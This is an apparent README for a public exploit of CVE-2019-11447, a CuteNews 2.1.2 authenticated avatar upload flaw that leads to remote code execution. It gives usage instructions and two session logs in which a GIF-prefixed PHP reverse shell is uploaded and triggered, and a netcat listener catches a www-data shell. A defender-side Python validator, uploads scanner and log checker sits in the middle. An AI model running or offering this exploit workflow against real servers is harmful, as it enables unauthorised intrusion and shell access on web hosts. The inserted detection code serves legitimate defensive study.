Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: log in to or register an account, prepend GIF magic bytes to a user-selected PHP file, upload it as an avatar, and trigger it to achieve remote code execution.
Intended only for educational purposes and testing in corporate environments.
This exploit was tested with Python 3.8.6.
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit usage:
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
This exploit expects four arguments to run:
- -l : CuteNews URL
- -u : Username used to log in or register
- -p : Password used to log in or register
- -e : Email used to log in or register
Additional required user inputs:
- Select your PHP file -> Here the user specifies the PHP file to upload. It can be any PHP file, for example a PHP info page or a PHP reverse shell. If the PHP file is in the same directory as the exploit, the file name alone is enough:
Example: [^] Select your PHP file -> rev.php
Otherwise, the user must give the path to the PHP file:
Example: [^] Select your PHP file -> ~/Downloads/rev.php
- Press y/n to trigger reverse shell -> If the uploaded file is a PHP reverse shell, the user chooses with y/n whether to trigger it.
Either way, the exploit prints the uploaded file's location for further use.
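The weakness this exploit relies on is an avatar handler that trusts the leading GIF magic bytes and then serves the stored file from a web-reachable uploads/ path where the server will execute it. The script below is an added example written from the server side; it is not code from the exploit or from CuteNews. It shows (1) a hardened upload check that rejects a file whose extension, signature and body disagree, (2) a scan of an existing uploads directory for GIF-prefixed PHP polyglots that were accepted earlier, and (3) a check of web server access-log lines for direct requests to a script under uploads/. The sample files, log lines and the uploads/ path convention (taken from the file locations shown in this README) are all constructed for the demonstration; the allowed-extension and script-extension lists are assumptions a deployment should adjust.

```python
"""Defender-side checks for the GIF-prefixed PHP avatar pattern (added example)."""
import os
import re
import tempfile

# Image signatures an avatar handler should accept (leading bytes -> extension).
IMAGE_MAGIC = {
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
}
ALLOWED_EXT = {".gif", ".png", ".jpg"}          # assumed allowlist for avatars
# A PHP open tag has no business anywhere inside a genuine image.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Access-log request for a server-side script under an uploads/ directory
# (script extensions are an assumed list; extend to match the server config).
UPLOAD_SCRIPT = re.compile(
    r'"(?:GET|POST) (/[^" ]*/uploads/[^" ]*\.(?:php\d?|phtml|phar))(?:\?[^" ]*)? HTTP'
)


def magic_extension(data: bytes):
    """Return the image extension implied by the leading bytes, or None."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_avatar(filename: str, data: bytes) -> list:
    """Hardened upload check: list of reasons to reject (empty list = accept).

    A magic-byte check alone is exactly what a GIF-prefixed PHP file defeats,
    so the extension, the signature and the body must all agree."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension {ext or '(none)'} not allowed")
    implied = magic_extension(data)
    if implied is None:
        reasons.append("no recognised image signature")
    elif implied != ext:
        reasons.append(f"signature says {implied}, name says {ext or '(none)'}")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag inside image data")
    return reasons


def scan_uploads(directory: str) -> dict:
    """Re-check every file already stored under an uploads directory."""
    findings = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                data = fh.read()
            reasons = validate_avatar(name, data)
            if reasons:
                findings[os.path.relpath(path, directory)] = reasons
    return findings


def find_upload_requests(log_lines) -> list:
    """Return (client_ip, path) for log lines requesting a script under uploads/."""
    hits = []
    for line in log_lines:
        m = UPLOAD_SCRIPT.search(line)
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits


def demo():
    """Run both checks over constructed sample data and return the results."""
    # Constructed files: a minimal real GIF, a GIF-prefixed PHP file (the
    # polyglot pattern), a bare PHP file, and a GIF misnamed as PNG.
    samples = {
        "avatar_ok.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;",
        "avatar_cold_cold.php": b"GIF89a<?php echo 'constructed sample'; ?>",
        "avatar_plain.php": b"<?php echo 'constructed sample'; ?>",
        "avatar_mismatch.png": b"GIF89a\x01\x00\x01\x00;",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        findings = scan_uploads(d)
    # Constructed access-log lines in Apache combined format.
    log = [
        '127.0.0.1 - - [10/Oct/2020:03:06:04 +0000] "GET /CuteNews/uploads/avatar_cold_cold.php HTTP/1.1" 200 312 "-" "python-requests/2.24.0"',
        '127.0.0.1 - - [10/Oct/2020:03:05:59 +0000] "GET /CuteNews/uploads/avatar_ok.gif HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
        '127.0.0.1 - - [10/Oct/2020:03:05:50 +0000] "POST /CuteNews/index.php HTTP/1.1" 302 0 "-" "python-requests/2.24.0"',
    ]
    return findings, find_upload_requests(log)


if __name__ == "__main__":
    findings, hits = demo()
    for path, reasons in findings.items():
        print(f"[!] {path}: {'; '.join(reasons)}")
    for ip, path in hits:
        print(f"[!] {ip} requested server-side script {path}")
```

In the demo, only avatar_ok.gif passes validation; the GIF-prefixed PHP file is rejected for its extension, for the signature/name mismatch and for the embedded PHP tag, and the single log hit is the direct request for the .php file under uploads/. Validation of this kind belongs in the upload handler itself; the directory scan and log check are for finding what an earlier, weaker handler already let through. Serving uploads/ with script execution disabled (or from a host that never passes files to PHP) removes the execution step regardless of what the validator misses.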
- Scenario 1 > Logging in with existing credentials and getting a reverse shell:
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
- Scenario 2 > Registering a new user and getting a reverse shell:
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit